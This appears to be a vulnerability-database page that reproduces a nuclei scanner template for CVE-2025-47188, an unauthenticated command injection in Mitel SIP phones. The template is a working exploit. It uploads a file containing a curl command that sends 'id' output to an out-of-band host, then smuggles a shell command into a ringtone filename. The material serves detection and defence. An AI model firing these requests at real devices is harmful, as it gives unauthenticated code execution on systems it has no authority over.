Lucene search
K

Mitel 6000 - OS Command Injection

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 5 Views

Unauthenticated command injection in Mitel 6000/6970 SIP devices up to 6.4 SP4; update firmware.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-47188
12 May 202501:52
circl
CNNVD
Mitel多款产品 安全漏洞
7 Aug 202500:00
cnnvd
CVE
CVE-2025-47188
7 Aug 202500:00
cve
Cvelist
CVE-2025-47188
7 Aug 202500:00
cvelist
EUVD
EUVD-2025-23917
7 Aug 202500:00
euvd
NVD
CVE-2025-47188
7 Aug 202515:15
nvd
Positive Technologies
PT-2025-20724
12 May 202500:00
ptsecurity
RedhatCVE
CVE-2025-47188
9 Aug 202500:23
redhatcve
The Hacker News
⚡ Weekly Recap: Zero-Day Exploits, Developer Malware, IoT Botnets, and AI-Powered Scams
12 May 202512:10
thn
VulnCheck KEV
VulnCheck KEV: CVE-2025-47188
21 Jul 202500:00
vulncheck_kev
Rows per page
id: CVE-2025-47188

info:
  name: Mitel 6000 - OS Command Injection
  severity: critical
  author: matejsmycka
  description: |
    A vulnerability in the Mitel 6800 Series, 6900 Series, and 6900w Series SIP Phones through 6.4 SP4 (R6.4.0.4006), and the 6970 Conference Unit through 6.4 SP4 (R6.4.0.4006) or version V1 R0.1.0, could allow an unauthenticated attacker to conduct a command injection attack due to insufficient parameter sanitization. This template should be run on port 49249/tcp.
  impact: |
    Unauthenticated attackers can execute arbitrary commands, potentially disclosing or modifying sensitive data and disrupting device operation.
  remediation: |
    Update to the latest Mitel firmware version beyond 6.4 SP4.
  reference:
    - https://labs.infoguard.ch/posts/cve-2025-47188_mitel_phone_unauthenticated_rce/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-47188
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2025-47188
    epss-score: 0.48492
    epss-percentile: 0.98724
    cpe: cpe:2.3:a:mitel:6000:*:*:*:*:*:*:*:*
  metadata:
    vendor: mitel
    max-request: 2
    fofa-query: icon_hash="-1940372141" || icon_hash="-447557905"
  tags: cve,cve2025,rce,network,mitel,oast,oob,vkev

variables:
  waf_file: "524946462400000057415645666d7420100000000100010044ac000088580100020010006461746100000000"
  random_number: "{{rand_base(8)}}"

http:
  - raw:
      - |
       POST /cgi-bin/webconfig?page=upload_ringtone&action=submit&section=0&conn=0 HTTP/1.1
       Host: {{Hostname}}
       Content-Type: multipart/form-data; boundary=----0ba2fc3a8c91370bd74c5f7ab65fda3f

       ------0ba2fc3a8c91370bd74c5f7ab65fda3f
       Content-Disposition: form-data; name="upload_ringtone/newfile"; filename="{{random_number}}.txt"

       {{hex_decode(waf_file)}}
       curl -d $(id) {{interactsh-url}}
       ------0ba2fc3a8c91370bd74c5f7ab65fda3f--

      - |
       POST /cgi-bin/webconfig?page=upload_ringtone&action=submit&section=1&conn=0 HTTP/1.1
       Host: {{Hostname}}
       Content-Type: multipart/form-data; boundary=----0ba2fc3a8c91370bd74c5f7ab65fda3f

       ------0ba2fc3a8c91370bd74c5f7ab65fda3f
       Content-Disposition: form-data; name="upload_ringtone/newfile"; filename="fake$(sh ${HOME}userdata${HOME}ringtone${HOME}{{random_number}}.txt).wav"


       This is an invalid WAV file
       ------0ba2fc3a8c91370bd74c5f7ab65fda3f--

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body_1
        words:
          - "ringtone.html"
# digest: 4a0a00473045022033c86396ceeb4e012da91dffcae9af5ddc57d631366d62ac37ca4a6b96210ee60221008fc4709049afe85e80faa977457f79e1f624a847e2a2d2d75456564792fcd0d2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Jun 2026 11:45Current
7.3High risk
Vulners AI Score7.3
CVSS 3.16.5
EPSS0.48492
SSVC
5